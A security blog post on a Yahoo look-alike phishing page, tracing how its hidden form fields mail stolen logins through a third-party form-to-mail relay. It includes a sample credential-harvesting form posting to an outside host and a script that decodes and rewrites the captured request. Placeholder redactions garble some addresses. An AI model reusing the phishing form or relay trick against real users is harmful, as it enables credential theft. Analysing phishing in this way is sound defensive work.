I would like to share with you a phishing experience I had to face recently.
For those who need an introduction to phishing:
Phishing and Identity Theft
In computing, phishing is a form of criminal activity that uses social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out by email or instant message, although phone contact has been used as well.
Most phishing relies on some form of technical deception designed to make a link in a message appear to belong to the spoofed organization. Misspelled URLs, look-alike domain names and the use of subdomains (for example, a hostname that merely starts with the real brand's name) are common tricks used by phishers.
Recently I received an instant message (Yahoo) from one of my friends who is not very good with the technical aspects of the Internet; he is just an ordinary Internet user. The message received:
Click this link and login ur yahoo id, u will get a wonderful gift enjoy. pls send this message to all ur buddies
As enthusiastic users, we all have the tendency to open such a link. When the user clicks on the above link, it opens the page displayed below:
If you look closely at the displayed page, it looks very similar to the Yahoo login page. However, it is not a Yahoo page. The cracker (let's not call him a hacker, as hacking is never unethical) has cleverly created a web page that closely imitates the Yahoo login page. When a novice user fills in his username and password and clicks the Sign In button, the entered credentials are sent in the background to some database or email ID. My friend entered his username and password unknowingly and ..... So I decided to find the culprit.
Lets Find The Culprit
Using Tamper Data (an add-on for Mozilla Firefox), I captured the information sent by this web page. See the screenshot below:
If you look at the image closely, you can see the following (refer to the red lines):
* When the user clicks the Sign In button, the form is posted to http://www2.fiberbit.net/form/mailto.cgi, a third-party form-to-mail script. The look-alike page itself needs no server-side code of its own; everything it steals is carried in the form fields.
* The hidden field "Mail_To" tells that script to mail the submitted fields to email@example.com.
* The mail will appear to come from SpArKz (the "Mail_From" field).
* Once the mail is sent, the browser is redirected to http://photos.yahoo.com (the "Next_Page" field), so the victim lands on a genuine Yahoo page and has no reason to suspect anything.
So we have found the cracker here: the address the stolen credentials are mailed to is firstname.lastname@example.org.
A step further.
Using the same tool mentioned above, the data sent from a web page can be altered. So what I did was change the "Mail_To" value from email@example.com (in the captured request the email ID firstname.lastname@example.org is represented as love.cynade%40gmail.com, since the browser percent-encodes the @ sign as %40) to email@example.com (my email ID). And hurray, I got the details delivered to my mailbox. See the screenshot below:
The mail contained full information about the user who visited the site, which includes:
* The ISP of the user - in my case Asianet.co.in.
* The IP address of the user - in my case 202.**.227.*** (masked for security reasons).
* Together with the stolen username and password, these details are what an attacker needs to pick a target: the IP address and ISP tell him where the victim's machine is and which network to probe next.
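The form analysis in "Lets Find The Culprit" and the "Mail_To" rewrite in "A step further", as an added example that is not code from the original post. The HTML and the captured POST body below are constructed samples modelled on the page described above; the field names, the form action and the values in them are assumptions made for illustration, and the recipient addresses are placeholders. The script extracts the form action and hidden fields from the look-alike page, decodes the submitted body the way Tamper Data displays it, and re-encodes it with a different "Mail_To", which is exactly the edit made before the request left the browser.

```python
"""Dissect a form-to-mail phishing page and the POST it sends.

Added example, not code from the original post. SAMPLE_FORM_HTML and
SAMPLE_POST_BODY are constructed samples modelled on the page the post
describes; every hostname, field name and value in them is an assumption.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed look-alike login form: the inputs the victim sees plus the
# hidden fields that tell the third-party mailto.cgi where to deliver them.
SAMPLE_FORM_HTML = """
<form method="post" action="http://www2.fiberbit.net/form/mailto.cgi">
  <input type="hidden" name="Mail_To"   value="email@example.com">
  <input type="hidden" name="Mail_From" value="SpArKz">
  <input type="hidden" name="Next_Page" value="http://photos.yahoo.com">
  <input type="text"     name="login">
  <input type="password" name="passwd">
  <input type="submit"   value="Sign In">
</form>
"""

# Constructed POST body as a proxy or Tamper Data would show it: the browser
# percent-encodes "@" as %40 and "://" as %3A%2F%2F before sending.
SAMPLE_POST_BODY = (
    "login=victim&passwd=hunter2"
    "&Mail_To=email%40example.com&Mail_From=SpArKz"
    "&Next_Page=http%3A%2F%2Fphotos.yahoo.com"
)


class FormExtractor(HTMLParser):
    """Collect each form's action, its hidden inputs and its visible fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        kind = (a.get("type") or "text").lower()
        if tag == "form":
            self._form = {"action": a.get("action", ""), "hidden": {}, "fields": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if kind == "hidden":
                self._form["hidden"][a.get("name", "")] = a.get("value", "")
            elif kind != "submit":
                self._form["fields"].append((a.get("name", ""), kind))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def same_site(host, expected):
    """True only for the expected domain or a real subdomain of it, so that a
    hostname that merely ends in the brand name (evilyahoo.com) does not pass."""
    return host == expected or host.endswith("." + expected)


def audit_login_form(html, expected_host):
    """Return findings for a form that asks for a password but posts elsewhere."""
    parser = FormExtractor()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        asks_password = any(kind == "password" for _, kind in form["fields"])
        action_host = urlparse(form["action"]).hostname or ""
        if asks_password and not same_site(action_host, expected_host):
            findings.append("password field posts to %s, not %s" % (action_host, expected_host))
        if "Mail_To" in form["hidden"]:
            findings.append("form-to-mail relay delivers fields to %s" % form["hidden"]["Mail_To"])
        if "Next_Page" in form["hidden"]:
            findings.append("victim is bounced to %s afterwards" % form["hidden"]["Next_Page"])
    return findings


def decode_submission(body):
    """Turn a captured x-www-form-urlencoded body into a plain dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def rewrite_mail_to(body, new_recipient):
    """Re-encode the captured body with Mail_To replaced, which is the edit
    Tamper Data lets you make before the request leaves the browser."""
    fields = decode_submission(body)
    fields["Mail_To"] = new_recipient
    return urlencode(fields)


if __name__ == "__main__":
    for line in audit_login_form(SAMPLE_FORM_HTML, "yahoo.com"):
        print("-", line)
    print(decode_submission(SAMPLE_POST_BODY))
    print(rewrite_mail_to(SAMPLE_POST_BODY, "me@example.net"))
```

The same-site check is deliberately strict: comparing with a bare `endswith("yahoo.com")` would accept a registered look-alike such as `notyahoo.com`, which is the kind of trick the introduction warns about. The "Mail_To" rewrite only works because the relay trusts whatever recipient the client sends; any form-to-mail service that accepts an arbitrary recipient in a hidden field can be turned into a credential drop box in exactly this way.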
Tracing Down the Cracker
To trace the location of the hacker who was using the email ID firstname.lastname@example.org, I created a temporary email ID, registered a temporary account with ReadNotify.com and shot some mails to email@example.com. And hooray, when he opened the mails I got his IP address, and that's it.
I also wrote to Yahoo regarding the same, and they immediately removed the site from Geocities and replied back. And within weeks Yahoo changed their login screen as well. The cracker was able to get into many compromised accounts, and from there into many other accounts such as banks and e-commerce sites, using this simple technique.
The URL quoted above is currently not available, as it has been removed by Yahoo. But there are still thousands of phishing sites out there that exploit the human factor rather than any flaw in the technology.
Do you have any similar experiences? Share them here: in what ways has a hacker approached you? ......
MVP (Enterprise Security), ISLA-2010 (ISC)², C|EH, C|HFI, CCNA, MCP,
Certified ISO 27001:2005 Lead Auditor
There are 3 roads to spoil; women, gambling & hacking. The most pleasant with women, the quickest with gambling, but the surest is hacking - c0c0n